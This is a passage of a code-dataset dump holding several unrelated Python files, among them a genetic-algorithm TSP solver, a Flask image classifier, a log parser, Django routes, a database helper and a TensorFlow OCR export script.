else:\n res.append(ind.genes[i])\n ind.setGene(res)\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def crossover(self, indA, indB):\n \"\"\"\n Executes a 1 order crossover and returns a new individual\n \"\"\"\n child = []\n tmp = {}\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n for i in range(0, self.genSize):\n if i >= min(indexA, indexB) and i <= max(indexA, indexB):\n tmp[indA.genes[i]] = False\n else:\n tmp[indA.genes[i]] = True\n aux = []\n for i in range(0, self.genSize):\n if not tmp[indB.genes[i]]:\n child.append(indB.genes[i])\n else:\n aux.append(indB.genes[i])\n child += aux\n return child\n\n def mutation(self, ind):\n \"\"\"\n Mutate an individual by swapping two cities with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def updateMatingPool(self):\n \"\"\"\n Updating the mating pool before creating a new generation\n \"\"\"\n self.matingPool = []\n for ind_i in self.population:\n self.matingPool.append( ind_i.copy() )\n\n def newGeneration(self):\n \"\"\"\n Creating a new generation\n 1. Selection\n 2. Crossover\n 3. Mutation\n \"\"\"\n for i in range(0, int(len(self.population)/2),2):\n \"\"\"\n Depending on the experiment the most suitable algorithms are used for:\n 1. Select two candidates\n 2. Apply Crossover\n 3. Apply Mutation\n \"\"\"\n\n #Selection of Parents\n if self.selection == 'Rand':\n parentA, parentB = self.randomSelection()\n elif self.selection == 'SUS':\n parentA, parentB = self.stochasticUniversalSampling()\n else:\n print('Incorrect Input - Enter a valid selection method')\n\n #Crossover\n if self.crossover_type == 'uniform':\n childA_l,childB_l = self.uniformCrossover(parentA, parentB)\n elif self.crossover_type == 'PMX':\n childA_l,childB_l = self.pmxCrossover(parentA,parentB)\n else:\n print('Incorrect Input - Enter a valid Crossover type')\n\n #Create new Individual-> child\n childA = Individual(self.genSize, self.data)\n childA.setGene(childA_l)\n childB = Individual(self.genSize, self.data)\n childB.setGene(childB_l)\n\n #Mutation\n if self.mutation_type == 'Inv':\n self.inversionMutation(childA)\n self.inversionMutation(childB)\n elif self.mutation_type == 'RecExc':\n self.reciprocalExchangeMutation(childA)\n self.reciprocalExchangeMutation(childB)\n else:\n print('Incorrect Input - Enter a valid Mutation type')\n\n childA.computeFitness()\n childB.computeFitness()\n self.population[i] = childA\n self.population[i+1] = childB\n\n def GAStep(self):\n \"\"\"\n One step in the GA main algorithm\n 1. Updating mating pool with current population\n 2. Creating a new Generation\n \"\"\"\n\n self.updateMatingPool()\n self.newGeneration()\n\n def search(self):\n \"\"\"\n General search template.\n Iterates for a given number of steps\n \"\"\"\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())\n\nif len(sys.argv) < 5:\n print (\"Error - Incorrect input\")\n print (\"Expecting python TSP_R00182510.py [instance] [population size] [mutation rate] [Iterations] \")\n sys.exit(0)\n\n#Refer report to run required experiments for the below assignments\nproblem_file = sys.argv[1]\npop_size = int(sys.argv[2])\nMutation_rate = float(sys.argv[3])\nIteration = int(sys.argv[4])\n\nprint('Problem File : ',problem_file)\nprint('Population size : ',pop_size)\nprint('Mutation rate : ',Mutation_rate)\nprint('Iterations : ',Iteration)\nprint('SUS - num parents selected : popsize')\n\n# To run Configurations 1 or 2 -> uncomment the code between the tags \n# -> comment out the code between tags \n\n# To run Configurations 3 to 8 (any) -> uncomment the code between tags \n# -> comment out the code between tags \n\n#\nprint(\"\\nConfiguration 1 - Random population, Random Selection, Uniform Crossover, Inversion mutation\")\nfor i in range(5):\n ga1 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'Rand', 'uniform', 'Inv')\n ga1.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 2 - Random population, Random Selection, PMX Crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga2 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'Rand', 'PMX', 'RecExc')\n ga2.search()\n print(\"\\n\")\n#\n\n\n#\nprint(\"\\nConfiguration 3 - Random population, Stochastic Universal sampling, uniform crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga3 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'uniform', 'RecExc')\n ga3.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 4 - Random population, Stochastic Universal sampling, PMX Crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga4 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'PMX', 'RecExc')\n ga4.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 5 - Random population, Stochastic Universal sampling, PMX Crossover, Inversion mutation\")\nfor i in range(5):\n ga5 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'PMX', 'Inv')\n ga5.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 6 - Random population, Stochastic Universal sampling, Uniform crossover, Inversion mutation\")\nfor i in range(5):\n ga6 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'uniform', 'Inv')\n ga6.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 7 - Heuristic population, Stochastic Universal sampling, PMX crossover, Reciprocal Exchange\")\nfor i in range(5):\n ga7 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Heuristic', 'SUS', 'PMX', 'RecExc')\n ga7.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 8 - Heuristic population, Stochastic Universal sampling, Uniform crossover, Inversion mutation\")\nfor i in range(5):\n ga8 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Heuristic', 'SUS', 'uniform', 'Inv')\n ga8.search()\n print(\"\\n\")\n#","sub_path":"Metaheuristics/Assignment 1/Submission/myTSP_toStudents_V4.py","file_name":"myTSP_toStudents_V4.py","file_ext":"py","file_size_in_byte":16637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324280873","text":"from flask import Flask, request, abort, jsonify\nimport numpy as np\nimport glob\nfrom PIL import Image, ImageFile\nfrom skimage.feature import greycomatrix, greycoprops\nimport pickle\nfrom os.path import isfile\nfrom io import BytesIO\nimport base64\nimport os\nfrom flask_cors import CORS, cross_origin\nimport random\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef extract_feature(path):\n img = Image.open(path)\n img = img.resize([128, 128])\n img = img.convert('L')\n img = np.array(img)\n feature = []\n glcm = greycomatrix(\n img, [4, 5], [0, np.pi/4, np.pi/2, 3*np.pi/4], symmetric=True, normed=False)\n contrast = greycoprops(glcm, 'contrast')\n homogeneity = greycoprops(glcm, 'homogeneity')\n energy = greycoprops(glcm, 'energy')\n asm = greycoprops(glcm, 'ASM')\n feature.append(contrast[0][0])\n feature.append(contrast[0][1])\n feature.append(contrast[0][2])\n feature.append(contrast[0][3])\n\n feature.append(homogeneity[0][0])\n feature.append(homogeneity[0][1])\n feature.append(homogeneity[0][2])\n feature.append(homogeneity[0][3])\n\n feature.append(energy[0][0])\n feature.append(energy[0][1])\n feature.append(energy[0][2])\n feature.append(energy[0][3])\n\n feature.append(asm[0][0])\n feature.append(asm[0][1])\n feature.append(asm[0][2])\n feature.append(asm[0][3])\n return feature\n\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\n@app.route('/')\n@app.route('/index')\n@cross_origin()\ndef index():\n return \"Hello World\"\n\n\n@app.route('/proses', methods=['GET', 'POST'])\n@cross_origin()\ndef proses():\n if request.method == \"POST\":\n result = \"\"\n random_int = [100]\n presentase = random_int[random.randint(0, len(random_int) - 1)]\n if 'file' not in request.files:\n result = \"No File\"\n else:\n file = request.files['file']\n if file.filename == '':\n result = \"No File\"\n if file and allowed_file(file.filename):\n file_predict = extract_feature(file)\n loaded_model = pickle.load(open('./finalized_model.sav', 'rb'))\n predict = loaded_model.predict(np.array([file_predict]))\n if predict[0] == 0:\n result = \"Kambing\"\n elif predict[0] == 1:\n result = \"Oplosan\"\n else:\n presentase = 0\n result = \"Tidak Terindentifikasi\"\n return jsonify({\"result\": result, \"presentase\": \"{}%\".format(presentase)}), 200\n else:\n return \"Hello World\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479459409","text":"#!/usr/bin/env python3\n\nimport re\nimport csv\nimport operator\n\nerror_ranking = {}\nuser_entries = {}\n\ninfo_pattern = r\"ticky: INFO ([\\w ]*) .*\\(([\\w\\.]+)\\)\"\nerror_pattern = r\"ticky: ERROR ([\\w ]*) .*\\(([\\w\\.]+)\\)\"\n\nwith open(\"syslog.log\") as f:\n for line in f.readlines():\n print(line.strip())\n error = re.search(error_pattern, line)\n info = re.search(info_pattern, line)\n if not error is None:\n error_ranking[error.group(1)] = error_ranking.get(error.group(1), 0) + 1\n if error.group(2) in user_entries.keys():\n user_entries[error.group(2)][\"ERROR\"] = user_entries[error.group(2)].get(\"ERROR\", 0) + 1\n else:\n user_entries[error.group(2)] = {}\n user_entries[error.group(2)][\"ERROR\"] = 1\n user_entries[error.group(2)][\"INFO\"] = 0\n if not info is None:\n if info.group(2) in user_entries.keys():\n user_entries[info.group(2)][\"INFO\"] = user_entries[info.group(2)].get(\"INFO\", 0) + 1\n else:\n user_entries[info.group(2)] = {}\n user_entries[info.group(2)][\"INFO\"] = 1\n user_entries[info.group(2)][\"ERROR\"] = 0\n\n f.close()\n\nerror_ranking = sorted(error_ranking.items(), key=operator.itemgetter(1), reverse=True)\nuser_entries = sorted(user_entries.items(), key=operator.itemgetter(0))\n\nwith open(\"error_message.csv\", \"w\") as error_file:\n writer = csv.DictWriter(error_file, fieldnames=[\"Error\", \"Count\"])\n writer.writeheader()\n for error in error_ranking:\n writer.writerow({\"Error\": error[0], \"Count\": error[1]})\n error_file.close()\n\nwith open(\"user_statistics.csv\", \"w\") as user_file:\n writer = csv.DictWriter(user_file, fieldnames=[\"Username\", \"INFO\", \"ERROR\"])\n writer.writeheader()\n for user in user_entries:\n writer.writerow({\"Username\": user[0], \"INFO\": user[1][\"INFO\"], \"ERROR\": user[1][\"ERROR\"]})\n user_file.close()\n\n","sub_path":"ticky_check.py","file_name":"ticky_check.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367367","text":"\"\"\"\nGiven an array of 2n integers, \nyour task is to group these integers into n pairs of integer, \nsay (a1, b1), (a2, b2), ..., (an, bn) which makes sum of min(ai, bi) \nfor all i from 1 to n as large as possible.\n\nExample 1:\nInput: [1,4,3,2]\nOutput: 4\nExplanation: n is 2, and the maximum sum of pairs is 4 = min(1, 2) + min(3, 4).\n\"\"\"\n\n\ndef arrayPairSum(nums):\n sum_min = 0\n nums.sort()\n for i in range(0, len(nums), 2):\n sum_min += nums[i]\n # sum_min += sum(nums[0::2])\n\n return sum_min\n\n\narr = [1, 4, 3, 2]\nprint(arrayPairSum(arr))\n","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309568639","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'jblab.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url('^', include('django.contrib.auth.urls')),\n # url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n # url(r'^accounts/logout/$', 'django.contrib.auth.views.logout'),\n\n url(r'^$', include('home.urls', namespace=\"home\")),\n url(r'^research/', include('research.urls', namespace=\"research\")),\n url(r'^publications/', include('publications.urls', namespace=\"publications\")),\n url(r'^members/', include('members.urls', namespace=\"members\")),\n url(r'^photos/', include('photos.urls', namespace=\"photos\")),\n\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"jblab/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514644272","text":"# third party imports\nfrom nautilus import ConnectionService\n\n# import the services to connect\nfrom recipe_book.ingredient import service as ingredient_service\nfrom recipe_book.recipe import service as recipe_service\n\nclass ServiceConfig:\n SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/ingredientRecipe.db'\n\nservice = ConnectionService(\n configObject=ServiceConfig,\n services=[\n ingredient_service,\n recipe_service,\n ]\n)\n","sub_path":"recipe_book/ingredientRecipe/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"410514783","text":"class Solution:\r\n # @param num, a list of integer\r\n # @return a list of lists of integers\r\n def permute(self, num):\r\n \"\"\"\r\n Third iteration\r\n \"\"\"\r\n return self.addOne(len(num) - 1, num)\r\n\r\n def addOne(self, i, num):\r\n if i == 0:\r\n return [[num[0]]]\r\n assert i > 0\r\n res, perms = [], self.addOne(i - 1, num)\r\n for p in perms:\r\n for j in reversed(range(len(p) + 1)):\r\n t = p[:j] + [num[i]] + p[j:]\r\n res.append(t)\r\n return res\r\n\r\ndef run():\r\n sol = Solution()\r\n ret = sol.permute([1,2,3])\r\n assert ret == [[1, 2, 3], [1, 3, 2], [3, 1, 2], [2, 1, 3], [2, 3, 1], [3, 2, 1]]\r\n","sub_path":"046-permutations.py","file_name":"046-permutations.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"335541140","text":"from os.path import join\nimport sys\n\nANALYSIS_PATH = '/Users/idan/src/analysis_utils'\nsys.path.append(ANALYSIS_PATH)\n\nfrom cochange_analysis import the_lower_the_better, the_higher_the_better\n\nREPOS_DIRECTORY = r'C:\\\\github-repos\\\\'\nCHECKSTYLE_LOGS_DIRECTORY = r'C:\\Users\\Nili\\Documents\\GitHub\\hotspots\\data\\agg-checkstyle-logs'\nCHECKSTYLE_ERROR_FILE = r\"C:\\Users\\Nili\\Documents\\GitHub\\hotspots\\data\\err_java_dir.txt\"\n\nBASE_PATH = r'/Users/idan/src/follow-your-nose/'\nDATA_PATH = BASE_PATH + r'data/'\nFIGURES_PATH = BASE_PATH + r'figures/'\nPERFORMANCE_PATH = BASE_PATH + r'performance/'\nMODELS_PATH = BASE_PATH + r'models/'\n\nBQ_PREFIX = 'java_repos_file_properties_'\n# Important files constants\nBQ_PROPERTIES_FILE = BQ_PREFIX + '2019.csv'\nBQ_ALL_YEARS = 'java_repos_file_properties_per_year.csv'\n\nSMELLS_PREFIX = 'hotspots_agg_1_1_'\nCHECKSTYLE_AGG_FILE = SMELLS_PREFIX + r'2019.csv'\nBINARY_CHECKSTYLE_AGG_FILE = r'binary_hotspots_agg.csv'\n\n\nDATASET_FILE = r'hotspots_joint.csv'\nBINARY_DATASET_FILE = r'binary_hotspots_joint.csv'\n\nALL_YEARS_DATASET = r'all_years_hotspots_joint.csv'\nBINARY_ALL_YEARS_DATASET = r'all_years_binary_hotspots_joint.csv'\n\nMONOTONICITY_STATS_FILE = 'monotonicity.csv'\nCOHANGE_STATS_FILE = 'smell_cohcnage_stats.csv'\nAUTHOR_TWIN_CM_FILE = 'file_by_author_twin_cm.csv'\nLENGTH_PEARSON_STATS = 'length_pearson_stats.csv'\nSMELL_REMOVAL_FILE = 'smell_removal_stats.csv'\nJOINT_STATS_FILE = 'joint_feature_stats.csv'\n\n\nNON_SMELLS = ['line_count_100', 'avg_coupling_java_size', 'avg_coupling_size_capped','avg_coupling_size'\n , 'avg_coupling_java_size_capped', 'commit_count', 'authors', 'commits', 'line_count',]\nADMINISTRATIVE_FEATURES = ['repository', 'file', 'filename', 'repo_name', 'full_file_name', 'file_name', 'year'\n ,'Author_email', 'fake_date', 'user', 'project']\n\nSINGLE_SMELL = ['ReturnCount',\n 'JavadocPackage',\n 'OverloadMethodsDeclarationOrder',\n 'MissingCtor',\n 'ArrayTrailingComma',\n 'TypeName',\n 'OneStatementPerLine',\n 'SeparatorWrap',\n 'AbstractClassName',\n 'LocalVariableName',\n 'BooleanExpressionComplexity',\n 'ImportControl',\n 'ParameterName',\n 'NoFinalizer',\n 'MethodName',\n 'TypecastParenPad',\n 'SingleLineJavadoc',\n 'FileTabCharacter',\n 'InvalidJavadocPosition',\n 'LeftCurly',\n 'UnnecessarySemicolonInEnumeration',\n 'VisibilityModifier',\n 'SummaryJavadoc',\n 'IllegalImport',\n 'NestedForDepth',\n 'StaticVariableName',\n 'MissingJavadocPackage',\n 'Indentation',\n 'UnnecessaryParentheses',\n 'EmptyCatchBlock',\n 'HiddenField',\n 'InterfaceIsType',\n 'EmptyForIteratorPad',\n 'IllegalToken',\n 'JavaNCSS',\n 'NonEmptyAtclauseDescription',\n 'FinalParameters',\n 'ClassTypeParameterName',\n 'FileLength',\n 'OuterTypeFilename',\n 'MissingSwitchDefault',\n 'ParenPad',\n 'MultipleVariableDeclarations',\n 'EqualsHashCode',\n 'WriteTag',\n 'MethodTypeParameterName',\n 'AbbreviationAsWordInName',\n 'VariableDeclarationUsageDistance',\n 'ClassMemberImpliedModifier',\n 'CatchParameterName',\n 'NestedTryDepth',\n 'AtclauseOrder',\n 'RedundantImport',\n 'IllegalThrows',\n 'AnonInnerLength',\n 'CustomImportOrder',\n 'OneTopLevelClass',\n 'AvoidEscapedUnicodeCharacters',\n 'JavadocMethod',\n 'DeclarationOrder',\n 'ModifierOrder',\n 'AvoidInlineConditionals',\n 'DefaultComesLast',\n 'InnerTypeLast',\n 'ArrayTypeStyle',\n 'InterfaceTypeParameterName',\n 'MethodLength',\n 'UpperEll',\n 'MissingDeprecated',\n 'EmptyForInitializerPad',\n 'JavadocVariable',\n 'SimplifyBooleanExpression',\n 'HideUtilityClassConstructor',\n 'WhitespaceAfter',\n 'SuperFinalize',\n 'OperatorWrap',\n 'UnusedImports',\n 'AvoidStarImport',\n 'AvoidStaticImport',\n 'NeedBraces',\n 'MutableException',\n 'NoLineWrap',\n 'TrailingComment',\n 'AnnotationUseStyle',\n 'Regexp',\n 'TodoComment',\n 'RedundantModifier',\n 'AvoidNestedBlocks',\n 'ClassFanOutComplexity',\n 'ConstantName',\n 'PackageName',\n 'ModifiedControlVariable',\n 'RequireThis',\n 'InnerAssignment',\n 'NestedIfDepth',\n 'InterfaceMemberImpliedModifier',\n 'DesignForExtension',\n 'MissingJavadocMethod',\n 'PackageDeclaration',\n 'UnnecessarySemicolonInTryWithResources',\n 'NPathComplexity',\n 'JavadocType',\n 'SuppressWarnings',\n 'ClassDataAbstractionCoupling',\n 'JavadocParagraph',\n 'FallThrough',\n 'IllegalType',\n 'LineLength',\n 'NoWhitespaceAfter',\n 'MissingOverride',\n 'UncommentedMain',\n 'JavadocTagContinuationIndentation',\n 'GenericWhitespace',\n 'EmptyLineSeparator',\n 'ParameterAssignment',\n 'JavadocStyle',\n 'RegexpOnFilename',\n 'ExplicitInitialization',\n 'LocalFinalVariableName',\n 'SingleSpaceSeparator',\n 'ParameterNumber',\n 'NoWhitespaceBefore',\n 'RightCurly',\n 'EmptyStatement',\n 'ThrowsCount',\n 'LambdaParameterName',\n 'EmptyBlock',\n 'StringLiteralEquality',\n 'CovariantEquals',\n 'MethodParamPad',\n 'CommentsIndentation',\n 'ExecutableStatementCount',\n 'MethodCount',\n 'MagicNumber',\n 'FinalClass',\n 'FinalLocalVariable',\n 'NewlineAtEndOfFile',\n 'EqualsAvoidNull',\n 'MemberName',\n 'AnnotationOnSameLine',\n 'SimplifyBooleanReturn',\n 'SuperClone',\n 'AnnotationLocation',\n 'WhitespaceAround',\n 'IllegalCatch',\n 'MultipleStringLiterals',\n 'ImportOrder',\n 'MissingJavadocType',\n 'NoClone',\n 'OuterTypeNumber',\n 'CyclomaticComplexity']\n\nNON_PREDICTIVE_FEATURES = set(['extension', 'is_test','bug_count', 'bug_hit_ratio', 'min_commit_in_year', 'extension'\n , 'is_test', 'corrective_commits', 'corrective_rate', 'file_ccp','length_group','quality_group'\n , 'worse_10_hs', 'concept'] + ADMINISTRATIVE_FEATURES + NON_SMELLS #+ SINGLE_SMELL\n ) # TODO - return groups as numbers\n\nexcluded_columns = ['line_count', 'commit_count', 'bug_count', 'bug_hit_ratio',\n 'min_commit_in_year', 'extension', 'is_test',\n 'commits', 'corrective_commits', 'corrective_rate', 'file_ccp', 'authors',\n 'avg_coupling_size'] + ADMINISTRATIVE_FEATURES\n\nCONCEPTS_DICT = {'file_ccp': the_lower_the_better\n #, 'avg_coupling_size': the_lower_the_better\n , 'avg_coupling_code_size_cut': the_lower_the_better\n , 'same_day_duration_avg': the_lower_the_better\n , 'prev_touch_ago': the_lower_the_better\n , 'random_metric': the_lower_the_better\n\n }\nCONCEPT_NAMES = {'file_ccp': 'CCP'\n , 'avg_coupling_code_size_cut': 'Coupling'\n , 'same_day_duration_avg': 'Duration'\n , 'prev_touch_ago': 'Detection'\n , 'random_metric': 'Random'\n }\n\nnot_to_binary_columns = ['line_count_100', 'length_group','quality_group', 'worse_10_hs', 'authors', 'year'] \\\n + list(CONCEPTS_DICT.keys())\n\nFEATURE_STATS_FILE = 'features_stats.csv'\n\nNUMERIC_NULL = -1\nTEST_SIZE = 0.2\nRANDOM_STATE = 37\n\nEARLIEST_ANALYZED_YEAR = 2017\n\nMIN_YEAR = 2017\nMAX_YEAR = 2019\n\nCOHANGE_STATS_TEMPLATE = 'cochange_stats_{metric}.csv'\n\nRELATIVE_MEANS_FILE = 'relative_means.csv'\n\nPREDICTIVE_STATS_TEMPLATE = 'predictive_stats_{concept}.csv'\nMONOTONE_PATH_TEMPLATE = join(DATA_PATH, \"monotnoicity_to_{monotone_column}.csv\")\nAUTHOR_TWIN_CM_TEMPLATE = 'file_by_author_twin_cm_{concept}.csv'\nAUTHOR_TWIN_PEARSON_TEMPLATE = 'file_by_author_twin_corr_{concept}.csv'\nJOINT_STATS_TEMPLATE = 'joint_feature_stats_{concept}.csv'\n\nRELATIVE_MEAN_PREFIX = 'cond_mean_'\nRELATIVE_MEAN_DIFF_PREFIX = 'cond_mean_diff_'\n","sub_path":"code/python/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"619757221","text":"def walk(obj):\n\n def set_node_by_path(obj, path, val):\n temp = obj\n #iterate through this level of keys\n for k in temp.keys() if type(temp) == dict else xrange(len(temp)):\n #if we're on the right track\n if k == path[0]:\n #Are we at the end?\n if len(path) == 1:\n temp[k] = val\n else:\n #recurse against temp[k]\n temp[k] = set_node_by_path(temp[k], path[1::], val)\n return temp\n\n\n def isiterable(o):\n return getattr(obj, '__iter__', False)\n\n def _walk(sub_obj, cb, acc=[]):\n # It would be nice to have this actually output a full object instead of\n # just attaching things to it later.\n class Node(object):\n def __init__(self, node, acc):\n self.value = node\n self.key = acc[-1]\n self.is_leaf = isiterable(node)\n self.is_root = (acc == [])\n self.path = acc\n self.level = len(acc)\n def set(self, v):\n return set_node_by_path(obj, self.path, v)\n\n\n # either the keys of the dict, or the indices of the list/tuple\n if getattr(sub_obj, '__iter__', False):\n for k in sub_obj.keys() if type(sub_obj) == dict else xrange(len(sub_obj)):\n #print obj[k]\n node = Node(sub_obj[k], acc+[k])\n #print(node)\n cb(node)\n if isiterable(sub_obj):\n _walk(sub_obj[k], cb, acc+[k])\n\n return lambda cb: _walk(obj, cb)\n\nif __name__==\"__main__\":\n tree = {'a': 1, 'b': [9, 9, 6, 7, 6]}\n\n print(\"Tree before: \"+repr(tree))\n\n @walk(tree)\n def node_printer(node):\n if node.value == [9, 9, 6, 7, 6] :\n node.set([9, 9, 7, 7, 5])\n\n print(\"Tree after: \"+repr(tree))\n","sub_path":"pywalk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"54267415","text":"from django.db import connection\nfrom decouple import config\nimport psycopg2\n\nclass QueryBuilder():\n ps_connection = psycopg2.connect(user=config('DATABASE_USER'),\n password=config('DATABASE_PASSWORD'),\n host=config('DATABASE_HOST'),\n port=config('DATABASE_PORT'),\n database=config('DATABASE_NAME'))\n\n cursor = ps_connection.cursor()\n\n def __init__(self):\n try:\n self.ps_connection = psycopg2.connect(user=config('DATABASE_USER'),\n password=config('DATABASE_PASSWORD'),\n host=config('DATABASE_HOST'),\n port=config('DATABASE_PORT'),\n database=config('DATABASE_NAME'))\n self.cursor = self.ps_connection.cursor()\n except BaseException as e:\n print(str(e))\n\n def dispose(self):\n try:\n self.ps_connection.commit()\n self.cursor.close()\n except BaseException as e:\n print(str(e))\n try:\n self.ps_connection.close()\n except BaseException as e:\n print(str(e))\n\n def closeConnection(self):\n try:\n self.cursor.close()\n self.ps_connection.close()\n except BaseException as e:\n print(str(e))\n\n def commit(self):\n try:\n self.conn.commit()\n except BaseException as e:\n print(str(e))\n\n \n \n \n \n \n\n \n ","sub_path":"cars/utility/query_builder.py","file_name":"query_builder.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42877710","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport math\r\nfrom six.moves import xrange\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.python.platform import gfile\r\nimport distance\r\nimport numpy as np\r\n\r\nfrom model.cnn import CNN\r\nfrom model.seq2seq_model import Seq2SeqModel\r\nfrom util.data_gen import DataGen\r\n\r\nslim = tf.contrib.slim\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'attn_num_hidden', 128,\r\n 'Number of hidden units in each layer in attention model.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'attn_num_layers', 2,\r\n 'Number of layers in attention model.')\r\n\r\ntf.app.flags.DEFINE_boolean(\r\n 'use_gru', False,\r\n 'Whether or not use GRU instead of LSTM.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_prediction_length', 11,\r\n 'Maximum length of the predicted string.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_image_height', 500,\r\n 'Maximum image height.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_image_width', 500,\r\n 'Maximum image width.')\r\n\t\r\ntf.app.flags.DEFINE_integer(\r\n 'target_embedding_size', 10,\r\n 'Embedding size for each target.')\r\n\t\r\ntf.app.flags.DEFINE_integer(\r\n 'gpu_id', 0,\r\n 'ID of the GPU to use (-1: CPU).')\r\n\r\ntf.app.flags.DEFINE_string(\r\n 'output_file', '', 'Where to save the resulting file to.')\r\n\r\nFLAGS = tf.app.flags.FLAGS\r\n\r\ndef prepare_image(img, width):\r\n\t\"\"\"Resize the image to a maximum height of `self.height` and maximum\r\n\twidth of `self.width` while maintaining the aspect ratio. Pad the\r\n\tresized image to a fixed size of ``[self.height, self.width]``.\"\"\"\r\n\tdims = tf.shape(img)\r\n\t\r\n\timg_data = tf.expand_dims(img, 0)\r\n\t\r\n\theight = tf.constant(DataGen.IMAGE_HEIGHT, dtype=tf.int32)\r\n\theight_float = tf.constant(DataGen.IMAGE_HEIGHT, dtype=tf.float64)\r\n\r\n\tmax_width = tf.to_int32(tf.ceil(tf.truediv(dims[1], dims[0]) * height_float))\r\n\tmax_height = tf.to_int32(tf.ceil(tf.truediv(width, max_width) * height_float))\r\n\r\n\tresized = tf.cond(\r\n\t\ttf.greater_equal(width, max_width),\r\n\t\tlambda: tf.cond(\r\n\t\t\ttf.less_equal(dims[0], height),\r\n\t\t\tlambda: tf.to_float(img_data),\r\n\t\t\tlambda: tf.image.resize_images(img_data, [height, max_width],\r\n\t\t\t\t\t\t\tmethod=tf.image.ResizeMethod.BICUBIC),\r\n\t\t),\r\n\t\tlambda: tf.image.resize_images(img_data, [max_height, width],\r\n\t\t\t\t\t\t\tmethod=tf.image.ResizeMethod.BICUBIC)\r\n\t)\r\n\r\n\tpadded = tf.image.pad_to_bounding_box(resized, 0, 0, height, width)\r\n\t\r\n\treturn padded\r\n\r\ndef build_graph(input_image,\r\n\t\t\t\tattn_num_hidden,\r\n\t\t\t\tattn_num_layers,\r\n\t\t\t\tuse_gru,\r\n\t\t\t\tmax_prediction_length,\r\n\t\t\t\tmax_image_height,\r\n\t\t\t\tmax_image_width,\r\n\t\t\t\ttarget_embedding_size):\r\n\t\t\t\t\r\n\t# We need resized width, not the actual width\r\n\tmax_resized_width = 1. * max_image_width / max_image_height * DataGen.IMAGE_HEIGHT\r\n\t\r\n\tmax_original_width = max_image_width\r\n\tmax_width = int(math.ceil(max_resized_width))\r\n\t\r\n\tencoder_size = int(math.ceil(1. * max_width / 4))\r\n\tdecoder_size = max_prediction_length + 2\r\n\tbuckets = [(encoder_size, decoder_size)]\r\n\r\n\timg_data 